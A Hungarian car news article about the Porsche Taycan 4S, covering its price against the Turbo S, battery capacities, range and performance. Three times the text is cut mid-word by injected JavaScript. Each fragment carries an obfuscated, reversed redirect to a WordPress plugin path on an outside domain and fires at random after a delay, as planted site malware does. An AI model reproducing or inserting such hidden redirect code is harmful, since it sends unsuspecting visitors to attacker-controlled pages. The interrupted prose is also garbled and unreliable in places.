A csúcsmodell Taycan Turbo S-nél 43 százalékkal olcsóbb (de persze még így is közel 106 ezer eurót kóstáló) Taycan 4S a Porsche villanyautó-családjának eddigi legkedvezőbb árú, de nem minden téren legkisebb tudású tagja. A most bemutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott belépőmodell kétféle akkucsomaggal rendelhető meg, amelyek eltérő kapacitást, más és más hatótávolságot, valamint bónuszként két teljesítményszintet biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítanak. Az alapverzió 79,2 kWh kapacitású akkuja 407 kilométerre elegendő áramot tud tárolni. A modell hajtáslánca 530 lóerős, a végsebesség 250 km/óra, a százas gyorsulás szintideje 4,0 mp. Ugyanilyen gyors a Turbo modellek nagyobb kapacitású (93,4 kWh) akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torával szerelt, nagyobbik belépőmodell, ám az 571 lóerős teljesítmény mellett komoly 463…
- Hirdetés -